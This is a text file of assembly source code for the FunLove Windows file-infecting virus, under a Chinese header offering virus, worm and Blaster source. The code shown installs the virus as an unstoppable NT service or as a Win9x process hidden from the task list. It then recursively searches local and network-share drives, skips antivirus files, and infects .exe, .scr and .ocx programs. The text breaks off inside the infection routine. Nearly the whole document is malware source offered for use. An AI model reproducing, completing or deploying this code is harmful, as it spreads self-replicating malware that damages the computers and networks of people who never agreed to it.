funlove 源代码 .txt

病毒源码 包括世上第一个病毒源码、蠕虫源码、冲击波源码

定位API的部分给去掉了
????????????????????????????????????????????????????????????????[FLCSS.ASM]???
.386
LARGESTACK
RADIX 16
ASSUME CS:CODE,DS:CODE
CODE SEGMENT USE32
org 100
main:
I equ 1000 - 300
@ equ + ebx - offset VStart
INCLUDE HEADER.ASM
VStart:
INCLUDE HEADER.ASM
; ------------------------------------------------------------------------- ;
; ---------------------------- Startup Code --------------------------- ;
; ------------------------------------------------------------------------- ;

Virus PROC NEAR

call GetVS

lea esi,[HostCode @]
mov edi,[esp]
sub edi,08
mov [esp],edi
movsd
movsd

push dword ptr [esp + 04]
call RelocKernel32

or eax,eax
jz short Exit

cmp byte ptr [OS @],00
jnz short NT_Srv

call Create9xProcess
ret

NT_Srv: call CreateNTService
Exit: ret


Virus ENDP


; ------------------------------------------------------------------------- ;
; -------------------- NT Service Creation Routine -------------------- ;
; ------------------------------------------------------------------------- ;


CreateNTService PROC PASCAL NEAR


LOCAL SCM_Handle : DWORD


call RelocAdvapi32

or eax,eax
jz short CNT_Failed

push 02
push 00 
push 00 ; get the service control manager
call OpenSCManagerA ; handler

or eax,eax
jz short CNT_Failed

mov SCM_Handle,eax

call CreateExecutable

or eax,eax ; if process is running, just exit
jz short CNT_Exit

mov edi,0F01FF
lea esi,[Service @]
push edi
push esi
push SCM_Handle
call OpenServiceA

or eax,eax
jnz short CNT_Run

xor eax,eax
push eax
push eax
push eax
push eax
push eax
lea eax,[Buffer1 @] ; -> flcss.exe
push eax
push 01 ; ErrorControl
push 02 ; Start
push 20 ; Type
push edi
push 00
push esi
push SCM_Handle
call CreateServiceA

or eax,eax
jz short CNT_Failed

CNT_Run:

push 00
push 00
push eax
call StartServiceA

or eax,eax
jnz short CNT_Exit

CNT_Failed:

call StartInfectionThread

CNT_Exit:

ret


CreateNTService ENDP


; ------------------------------------------------------------------------- ;
; -------------------- W9x Process Creation Routine ------------------- ;
; ------------------------------------------------------------------------- ;


Create9xProcess PROC NEAR


call CreateExecutable

or eax,eax
jz short P9x_Exit

P9x_00:

xor eax,eax
lea edi,[Buffer2 @]
push edi
push edi
mov ecx,040
repz stosd

mov cl,06
push eax
loop $ - 1

lea esi,[Buffer1 @]
push esi
push 00
call CreateProcessA

or eax,eax
jnz short P9x_Exit

P9x_Failed:

call StartInfectionThread

P9x_Exit:
ret


Create9xProcess ENDP


; ------------------------------------------------------------------------- ;
; --------------------- flcss.exe Creation Routine -------------------- ;
; ------------------------------------------------------------------------- ;


CreateExecutable PROC PASCAL NEAR


LOCAL c_FileHandle : DWORD, \
c_BytesWritten : DWORD

USES esi,edi


lea edi,[Buffer1 @]
push edi

push 104
push edi
call GetSystemDirectoryA

add edi,eax
mov al,'\'
stosb
lea esi,[Process @]
movsd
movsd
movsd

push 02 ; create always
call OpenFile

cmp eax,-1
jz short CE_Exit

mov c_FileHandle,eax

lea edi,[VImports + 4 @] ; clean main import table
mov eax,-1
stosd
stosd

lea edi,[Kernel32_Relocated @] ; restore 2nd imp. table
mov eax,[edi - 8] ; (necessary for NT)
stosd

push 00
lea esi,c_BytesWritten
push esi
push 0200
push ebx
push c_FileHandle
call WriteFile ; write header

push 00
push esi
push Phys_VSize
push ebx
push c_FileHandle
call WriteFile ; write vrs

push c_FileHandle
call CloseHandle

CE_Exit:

inc eax
ret


CreateExecutable ENDP


; ------------------------------------------------------------------------- ;
; --------------------------- Viral Service --------------------------- ;
; ------------------------------------------------------------------------- ;


VService PROC NEAR


call GetVS

push dword ptr [esp]
call RelocKernel32

or eax,eax
jz VS_Exit

cmp byte ptr [OS @],00
jz short W9x_Service_Register


WNT_Service_Hacknowledge:


call RelocAdvapi32
or eax,eax
jz VS_Exit

lea esi,[Buffer1 @]

xor eax,eax
lea ecx,[Service @]
lea edx,[ServiceDispatcher @]
mov [esi],ecx
mov [esi + 04],edx
mov [esi + 08],eax 
mov [esi + 0C],eax ; give control back to caller
; and jump to dispatcher 
push esi
call StartServiceCtrlDispatcherA


W9x_Service_Register:


lea esi,[USER32_Name @]
push esi
call LoadLibraryA

lea esi,[RegisterClassA + 7 @]
push esi
push eax
call GetProcAddress

or eax,eax
jz short VS_00

mov [esi - 06],eax

lea esi,[Buffer1 @]
mov edi,esi
xor eax,eax
mov ecx,0A
repz stosd

mov dword ptr [esi + 04],-1 ; ? (must be <> 0)
mov dword ptr [esi + 10],400000 ; image base
lea eax,[Service @]
mov [esi + 24],eax

push esi
call RegisterClassA ; necessary, or RSP won't work

lea esi,[RegisterServiceProcess + 7 @]
push esi
push dword ptr [Kernel32_Base @]
call GetProcAddress

or eax,eax
jz short VS_00

mov [esi - 06],eax

call GetCurrentProcessId 
; register our process in order
push 01 ; to vanish from the task list
push eax 
call RegisterServiceProcess

push 8*1000d ; wait 8 seconds
call Sleep

VS_00:
call StartInfectionThread

VS_Exit:
ret


VService ENDP


; ------------------------------------------------------------------------- ;
; ----------------------- NT Service Dispatcher ----------------------- ;
; ------------------------------------------------------------------------- ;


ServiceDispatcher PROC PASCAL NEAR


LOCAL Service_Handle : DWORD


call GetVS

lea esi,[ServiceHandler @]
lea edi,[Service @]
push esi
push edi
call RegisterServiceCtrlHandlerA

mov Service_Handle,eax

lea esi,[Buffer1 @]
mov edi,esi
mov ecx,06
xor eax,eax
repz stosd

mov dword ptr [esi],10
mov dword ptr [esi + 04],04
mov dword ptr [esi + 08],07

push esi 
push Service_Handle ; now tell windows our service
call SetServiceStatus ; correctly started

push 8*1000d
call Sleep

call StartInfectionThread
ret


ServiceDispatcher ENDP


; ------------------------------------------------------------------------- ;
; -------------------------- Service Handler -------------------------- ;
; ------------------------------------------------------------------------- ;


ServiceHandler PROC NEAR


ret ; if the admin tries to halt the
; service, he'll get a system error

ServiceHandler ENDP


; ------------------------------------------------------------------------- ;
; ------------------- Thread Creation Routine ------------------ ;
; ------------------------------------------------------------------------- ;


StartInfectionThread PROC PASCAL NEAR


LOCAL ThreadId : DWORD


call GetTickCount
mov [Rand @],eax

lea eax,ThreadId
push eax
push 0
push 0
lea eax,[VThread @]
push eax
push 0
push 0
call CreateThread
ret


StartInfectionThread ENDP


; ------------------------------------------------------------------------- ;
; ---------------------------- Viral Thread --------------------------- ;
; ------------------------------------------------------------------------- ;


VThread PROC NEAR


call GetVS

call InfectDrives

push 60d * 1000d
call Sleep

call GetRand
and al,1F
jnz short VThread

call InfectNetwork
jmp short VThread


VThread ENDP


; ------------------------------------------------------------------------- ;
; --------------------- Network Infection Routine --------------------- ;
; ------------------------------------------------------------------------- ;


InfectNetwork PROC NEAR


lea eax,[MPR_Name @]
push eax
call LoadLibraryA

or eax,eax
jz short INet_Failed

push eax
lea esi,[MPR_Functions @]
push esi
call DLL_Relocate

or eax,eax
jz short INet_Failed

push 00
call NetSearch 

INet_Failed:

ret


InfectNetwork ENDP


; ------------------------------------------------------------------------- ;
; ---------------------- Valid Drive Test Routine --------------------- ;
; ------------------------------------------------------------------------- ;


InfectDrives PROC NEAR


push esi

call GetTickCount
mov [Tick @],eax

lea esi,[Buffer1 @]
mov dword ptr [esi],' \:@'

ID_TestDrive:

mov byte ptr [esi + 03],00
push esi
call GetDriveTypeA

cmp al,03 ; fixed disk
jz short ID_DriveOk

cmp al,04 ; network drive
jnz short ID_Invalid

ID_DriveOk:

add esi,03

push esi
call BlownAway

push esi
call FileSearch

sub esi,03

ID_Invalid:

mov al,[Buffer1 @]
inc al
mov [Buffer1 @],al

cmp al,'Z'
jna short ID_TestDrive

pop esi
ret


InfectDrives ENDP


; ------------------------------------------------------------------------- ;
; ----------------- Recursive Computer Search Routine ----------------- ;
; ------------------------------------------------------------------------- ;


NetSearch PROC PASCAL NEAR


ARG WNetStructAddrWORD ; pointer to the network struct (20h)

LOCAL EnumBufferAddrWORD, \ ; network buffer address
EnumBufferSizeWORD, \ ; network buffer size (4000h)
EnumNB_ObjectsWORD ; number of network structs enumerated

USES esi, edi


mov EnumBufferSize,4000
or EnumNB_Objects,-1

lea eax,WNetStructAddr
push eax
push WNetStructAddr
push 0
push 0
push 2
call WNetOpenEnumA

or eax,eax
jnz NET_Close

push 04
push 1000
push 4000
push 00
call VirtualAlloc

or eax,eax
jz short NET_Close

mov EnumBufferAddr,eax

NET_00:

mov esi,EnumBufferAddr

lea eax,EnumBufferSize
push eax
push esi
lea eax,EnumNB_Objects
push eax
push WNetStructAddr
call WNetEnumResourceA

or eax,eax
jnz short NET_Free

mov ecx,EnumNB_Objects
or ecx,ecx
jz short NET_00

NET_01:
push ecx
push esi

mov esi,[esi + 14] ; computer resource name
or esi,esi ; (\\XXX\C, for example)
jz short NET_03

cmp word ptr [esi],0041 ; floppy ?
jz short NET_03

lea edi,[Buffer1 @]

NET_02:

movsb
cmp byte ptr [esi],00
jnz short NET_02

mov al,'\'
stosb

push edi
call BlownAway

push edi
call FileSearch

NET_03:

pop esi

mov eax,[esi + 0C]
and al,2
cmp al,2
jnz short NET_04

push esi
call NetSearch

NET_04:
add esi,20
pop ecx
loop NET_01

jmp short NET_00

NET_Free:
push 8000
push 00
push EnumBufferAddr
call VirtualFree

NET_Close:
push WNetStructAddr
call WNetCloseEnum
ret


NetSearch ENDP


; ------------------------------------------------------------------------- ;
; ------------------- Recursive File Search Routine ------------------- ;
; ------------------------------------------------------------------------- ;


FileSearch PROC PASCAL NEAR


ARG CurrentDirEnd : DWORD
LOCAL SearchHandle : DWORD
USES esi,edi


mov eax,CurrentDirEnd
mov dword ptr [eax],002A2E2A ; *.*

lea edi,[Buffer2 @]
lea esi,[Buffer1 @]
push edi
push esi
call FindFirstFileA

cmp eax,-1
jz short RS_Exit

RS_00:
mov SearchHandle,eax

RS_01:
test byte ptr [edi],10 ; dir ?
jz short FileTest

RS_Directory:

cmp byte ptr [edi + 2C],'.'
jz short RS_Next

mov esi,edi
add esi,2C

mov edi,CurrentDirEnd

RSD_00:
movsb
cmp byte ptr [esi],0
jnz short RSD_00

mov al,'\'
stosb

push edi
call FileSearch

RS_Next:
lea edi,[Buffer2 @]
push edi
push SearchHandle
call FindNextFileA

or eax,eax
jnz short RS_01

push SearchHandle
call FindClose

RS_Exit:
ret

FileTest:

mov edx,[edi + 2C]
or edx,20202020
xor edx,61F81F61

lea esi,[SkipNames @] ; check av names
mov ecx,0C

FT_00:
lodsd
cmp edx,eax
jz short FT_Exit

loop FT_00

mov esi,edi
add esi,2C

FT_01:
lodsb
or al,al
jnz short FT_01

mov eax,[esi - 4] ; check extent
or eax,20202020

cmp eax,' xco'
jz short FT_02

cmp eax,' rcs'
jz short FT_02

cmp eax,' exe'
jnz short FT_Exit

FT_02:
mov eax,[edi + 20] ; minimum file size
cmp eax,2000
jc short FT_Exit

cmp al,03 ; self-infection test
jz short FT_Exit

lea esi,[Buffer1 @] ; get complete file name
lea edi,[Buffer3 @] ; with path
push edi

mov ecx,CurrentDirEnd
sub ecx,esi
repz movsb

lea esi,[Buffer2 @]
add esi,2C

FT_03:
movsb
cmp byte ptr [esi - 1],0
jnz short FT_03

call InfectFile

FT_Exit:
jmp RS_Next


FileSearch ENDP


; ------------------------------------------------------------------------- ;
; ----------------------- File Infection Routine ---------------------- ;
; ------------------------------------------------------------------------- ;


InfectFile PROC PASCAL NEAR


ARG i_Filename : DWORD

LOCAL i_FileHandle : DWORD, \
i_FileSize : DWORD, \
i_BytesRead : DWORD, \
i_VirusOffset : DWORD, \
i_MapHandle : DWORD, \
i_HostDep32 : DWORD, \
i_EP_Offset : DWORD


USES esi,edi


push i_Filename
push 03 ; open existing
call OpenFile

cmp eax,-1